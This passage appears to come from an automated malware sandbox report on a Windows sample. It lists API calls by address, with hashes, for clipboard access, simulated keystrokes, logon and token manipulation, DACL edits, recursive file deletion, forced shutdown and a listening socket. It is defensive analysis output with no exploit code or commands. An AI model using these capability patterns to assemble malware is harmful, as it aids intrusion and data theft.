                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                                        • String ID: @GUI_DRAGID$@U=u$F$p#^
                                                                                                                        • API String ID: 3429851547-4253469085
                                                                                                                        • Opcode ID: 508a200880fb2dcc4a96c1f3b3d0f8ba6faf4fc5b40d4db587102515b123718b
                                                                                                                        • Instruction ID: 8b808e43fcf4666124bd06d5fd4d09a42a9fe7d8a9a0dbda268f7e4305b14c51
                                                                                                                        • Opcode Fuzzy Hash: 508a200880fb2dcc4a96c1f3b3d0f8ba6faf4fc5b40d4db587102515b123718b
                                                                                                                        • Instruction Fuzzy Hash: 8E427E34604251AFDB25CF28CC84AAEBFE5FF9A310F140A19F6998B2A1D731E854DF51
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 005A48F3
                                                                                                                        • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 005A4908
                                                                                                                        • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 005A4927
                                                                                                                        • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 005A494B
                                                                                                                        • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 005A495C
                                                                                                                        • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 005A497B
                                                                                                                        • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 005A49AE
                                                                                                                        • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 005A49D4
                                                                                                                        • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 005A4A0F
                                                                                                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 005A4A56
                                                                                                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 005A4A7E
                                                                                                                        • IsMenu.USER32(?), ref: 005A4A97
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005A4AF2
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005A4B20
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 005A4B94
                                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 005A4BE3
                                                                                                                        • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 005A4C82
                                                                                                                        • wsprintfW.USER32 ref: 005A4CAE
                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 005A4CC9
                                                                                                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 005A4CF1
                                                                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 005A4D13
                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 005A4D33
                                                                                                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 005A4D5A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                                                        • String ID: %d/%02d/%02d$@U=u
                                                                                                                        • API String ID: 4054740463-2764005415
                                                                                                                        • Opcode ID: b53cf1990916259b6979721584fd6b92f4ecfde8e5ef31ab062c92eacc030165
                                                                                                                        • Instruction ID: ff3a53fc80c8389ccc4f5d2e9e7ab0a3bb3ed87342e9b58df4dc6d93e7d984d5
                                                                                                                        • Opcode Fuzzy Hash: b53cf1990916259b6979721584fd6b92f4ecfde8e5ef31ab062c92eacc030165
                                                                                                                        • Instruction Fuzzy Hash: 9312CC71600255ABEB258FA8DC49BAE7FF8BF86310F104529F516EB2E1DBB49940CF50
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0052F998
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0056F474
                                                                                                                        • IsIconic.USER32(00000000), ref: 0056F47D
                                                                                                                        • ShowWindow.USER32(00000000,00000009), ref: 0056F48A
                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 0056F494
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0056F4AA
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0056F4B1
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0056F4BD
                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0056F4CE
                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0056F4D6
                                                                                                                        • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0056F4DE
                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 0056F4E1
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0056F4F6
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 0056F501
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0056F50B
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 0056F510
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0056F519
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 0056F51E
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0056F528
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 0056F52D
                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 0056F530
                                                                                                                        • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0056F557
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 4125248594-2988720461
                                                                                                                        • Opcode ID: 99dcc326617ac6edcfe96143e748ccaf05a2417d214f9cd84eeb4c75766db03b
                                                                                                                        • Instruction ID: 278717d20a80338e72325e7e96d7edf358076d615b21dfaf1c2bde6e3d2b49e1
                                                                                                                        • Opcode Fuzzy Hash: 99dcc326617ac6edcfe96143e748ccaf05a2417d214f9cd84eeb4c75766db03b
                                                                                                                        • Instruction Fuzzy Hash: 30311D71E40218BBEB216BB55C4AFBF7E6CEB59B50F100466FA01E71D1CAB15D00ABA0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 005716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0057170D
                                                                                                                          • Part of subcall function 005716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0057173A
                                                                                                                          • Part of subcall function 005716C3: GetLastError.KERNEL32 ref: 0057174A
                                                                                                                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00571286
                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 005712A8
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 005712B9
                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 005712D1
                                                                                                                        • GetProcessWindowStation.USER32 ref: 005712EA
                                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 005712F4
                                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00571310
                                                                                                                          • Part of subcall function 005710BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005711FC), ref: 005710D4
                                                                                                                          • Part of subcall function 005710BF: CloseHandle.KERNEL32(?,?,005711FC), ref: 005710E9
                                                                                                                        Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
• String ID: $default$winsta0$Z]
• API String ID: 22674027-3859823317
APIs
  • Part of subcall function 005710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00571114
  • Part of subcall function 005710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571120
  • Part of subcall function 005710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 0057112F
  • Part of subcall function 005710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571136
  • Part of subcall function 005710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0057114D
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00570BCC
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00570C00
• GetLengthSid.ADVAPI32(?), ref: 00570C17
• GetAce.ADVAPI32(?,00000000,?), ref: 00570C51
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00570C6D
• GetLengthSid.ADVAPI32(?), ref: 00570C84
• GetProcessHeap.KERNEL32(00000008,00000008), ref: 00570C8C
• HeapAlloc.KERNEL32(00000000), ref: 00570C93
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00570CB4
• CopySid.ADVAPI32(00000000), ref: 00570CBB
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00570CEA
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00570D0C
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00570D1E
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570D45
• HeapFree.KERNEL32(00000000), ref: 00570D4C
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570D55
• HeapFree.KERNEL32(00000000), ref: 00570D5C
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570D65
• HeapFree.KERNEL32(00000000), ref: 00570D6C
• GetProcessHeap.KERNEL32(00000000,?), ref: 00570D78
• HeapFree.KERNEL32(00000000), ref: 00570D7F
  • Part of subcall function 00571193: GetProcessHeap.KERNEL32(00000008,00570BB1,?,00000000,?,00570BB1,?), ref: 005711A1
  • Part of subcall function 00571193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00570BB1,?), ref: 005711A8
  • Part of subcall function 00571193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00570BB1,?), ref: 005711B7
Similarity
• API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 4175595110-0
APIs
• OpenClipboard.USER32(005ACC08), ref: 0058EB29
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0058EB37
• GetClipboardData.USER32(0000000D), ref: 0058EB43
• CloseClipboard.USER32 ref: 0058EB4F
• GlobalLock.KERNEL32(00000000), ref: 0058EB87
• CloseClipboard.USER32 ref: 0058EB91
• GlobalUnlock.KERNEL32(00000000), ref: 0058EBBC
• IsClipboardFormatAvailable.USER32(00000001), ref: 0058EBC9
• GetClipboardData.USER32(00000001), ref: 0058EBD1
• GlobalLock.KERNEL32(00000000), ref: 0058EBE2
• GlobalUnlock.KERNEL32(00000000), ref: 0058EC22
• IsClipboardFormatAvailable.USER32(0000000F), ref: 0058EC38
• GetClipboardData.USER32(0000000F), ref: 0058EC44
• GlobalLock.KERNEL32(00000000), ref: 0058EC55
• DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0058EC77
• DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0058EC94
• DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0058ECD2
• GlobalUnlock.KERNEL32(00000000), ref: 0058ECF3
• CountClipboardFormats.USER32 ref: 0058ED14
• CloseClipboard.USER32 ref: 0058ED59
Similarity
• API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
• String ID:
• API String ID: 420908878-0
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 005869BE
• FindClose.KERNEL32(00000000), ref: 00586A12
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00586A4E
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00586A75
  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00586AB2
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00586ADF
Strings
Similarity
• API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
• String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
• API String ID: 3830820486-3289030164
APIs
• FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00589663
• GetFileAttributesW.KERNEL32(?), ref: 005896A1
• SetFileAttributesW.KERNEL32(?,?), ref: 005896BB
• FindNextFileW.KERNEL32(00000000,?), ref: 005896D3
• FindClose.KERNEL32(00000000), ref: 005896DE
• FindFirstFileW.KERNEL32(*.*,?), ref: 005896FA
• SetCurrentDirectoryW.KERNEL32(?), ref: 0058974A
• SetCurrentDirectoryW.KERNEL32(005D6B7C), ref: 00589768
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00589772
• FindClose.KERNEL32(00000000), ref: 0058977F
• FindClose.KERNEL32(00000000), ref: 0058978F
Strings
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
APIs
• FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 005897BE
• FindNextFileW.KERNEL32(00000000,?), ref: 00589819
• FindClose.KERNEL32(00000000), ref: 00589824
• FindFirstFileW.KERNEL32(*.*,?), ref: 00589840
• SetCurrentDirectoryW.KERNEL32(?), ref: 00589890
• SetCurrentDirectoryW.KERNEL32(005D6B7C), ref: 005898AE
• FindNextFileW.KERNEL32(00000000,00000010), ref: 005898B8
• FindClose.KERNEL32(00000000), ref: 005898C5
• FindClose.KERNEL32(00000000), ref: 005898D5
  • Part of subcall function 0057DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0057DB00
Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 2640511053-438819550
                                                                                                                        • Opcode ID: af2324613f000af4f34e0b339afbc49c4d921261e59c532d40635e96c8dd665d
                                                                                                                        • Instruction ID: bd9c7d75efeca15d4609e96e3d13370477dbf0bc7207b4d0043f2a5b7b236691
                                                                                                                        • Opcode Fuzzy Hash: af2324613f000af4f34e0b339afbc49c4d921261e59c532d40635e96c8dd665d
                                                                                                                        • Instruction Fuzzy Hash: 5431B23150021A6AEF20BFA4EC48AEE7FACBF46324F184156E954B2190DB30DE498F60
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 00588257
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00588267
                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00588273
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00588310
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00588324
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00588356
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0058838C
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00588395
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 1464919966-438819550
                                                                                                                        • Opcode ID: d6cc8b3e27ef4d0c61ede0a983e01e97532d2a048b51cb7c252edefd544a757f
                                                                                                                        • Instruction ID: 7c475f708cf66aeafc0f9aa510feada81e8ccd3ae88b66f64402f6417c7d0f99
                                                                                                                        • Opcode Fuzzy Hash: d6cc8b3e27ef4d0c61ede0a983e01e97532d2a048b51cb7c252edefd544a757f
                                                                                                                        • Instruction Fuzzy Hash: 47619E755043069FD710EF64C8459AEBBE9FF89310F448C1EF98993251EB31E945CB92
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00513AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00513A97,?,?,00512E7F,?,?,?,00000000), ref: 00513AC2
                                                                                                                          • Part of subcall function 0057E199: GetFileAttributesW.KERNEL32(?,0057CF95), ref: 0057E19A
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0057D122
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0057D1DD
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0057D1F0
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0057D20D
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0057D237
                                                                                                                          • Part of subcall function 0057D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0057D21C,?,?), ref: 0057D2B2
                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 0057D253
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057D264
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 1946585618-1173974218
                                                                                                                        • Opcode ID: 527ce4704561ca86f3cc44c9910bcd4dcce097dfb58a8c53f663bcab46498b5f
                                                                                                                        • Instruction ID: abb67afadee84401edae6accc36a28799cbe7b2ee976bf676f5319ac9f69929a
                                                                                                                        • Opcode Fuzzy Hash: 527ce4704561ca86f3cc44c9910bcd4dcce097dfb58a8c53f663bcab46498b5f
                                                                                                                        • Instruction Fuzzy Hash: B1617F3180110EAADF05EBE0D9569EDBFB5BF95300F648065E40677192EB316F49EB60
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1737998785-0
                                                                                                                        • Opcode ID: 40d53d5340cc6b32305873e304a09ba6f718dcd2d885cd50c9533605a6c0aa24
                                                                                                                        • Instruction ID: 2679c957e10afe80cde0d3453917f6397d87073afe060390bf164002e43e7b78
                                                                                                                        • Opcode Fuzzy Hash: 40d53d5340cc6b32305873e304a09ba6f718dcd2d885cd50c9533605a6c0aa24
                                                                                                                        • Instruction Fuzzy Hash: 8941CD35204611AFE320EF19D88AB19BFF5FF55318F14C499E8559B6A2C731EC46CB90
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 005716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0057170D
                                                                                                                          • Part of subcall function 005716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0057173A
                                                                                                                          • Part of subcall function 005716C3: GetLastError.KERNEL32 ref: 0057174A
                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 0057E932
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                        • String ID: $ $@$SeShutdownPrivilege
                                                                                                                        • API String ID: 2234035333-3163812486
                                                                                                                        • Opcode ID: a99771954b857ff24358e4ebec0add295ba28f475951914c1b531091c3dc5599
                                                                                                                        • Instruction ID: 3d8285020655f0a4da70bace973e2ded67ee0411d300582781ff7b42d04a9a9f
                                                                                                                        • Opcode Fuzzy Hash: a99771954b857ff24358e4ebec0add295ba28f475951914c1b531091c3dc5599
                                                                                                                        • Instruction Fuzzy Hash: 86012B33610311ABEB642678BC8BFBF7E5CB719740F148862FE07E21D1D6605C44A294
                                                                                                                        APIs
                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00591276
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00591283
                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 005912BA
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 005912C5
                                                                                                                        • closesocket.WSOCK32(00000000), ref: 005912F4
                                                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00591303
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 0059130D
                                                                                                                        • closesocket.WSOCK32(00000000), ref: 0059133C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 540024437-0
                                                                                                                        • Opcode ID: 93cef969da796da19ceebe48d052bfd0765d33f128b678d9899cb982a21ae9fa
                                                                                                                        • Instruction ID: 56d52344c05c3da122d081dace615ef2e542fafc9548844fce2655244f72d4ef
                                                                                                                        • Opcode Fuzzy Hash: 93cef969da796da19ceebe48d052bfd0765d33f128b678d9899cb982a21ae9fa
                                                                                                                        • Instruction Fuzzy Hash: F34190356005129FDB10EF24C488B69BFE6BF86318F188588E8568F2D2C775EC85CBE1
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 0054B9D4
                                                                                                                        • _free.LIBCMT ref: 0054B9F8
                                                                                                                        • _free.LIBCMT ref: 0054BB7F
                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,005B3700), ref: 0054BB91
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,005E121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0054BC09
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,005E1270,000000FF,?,0000003F,00000000,?), ref: 0054BC36
                                                                                                                        • _free.LIBCMT ref: 0054BD4B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 314583886-0
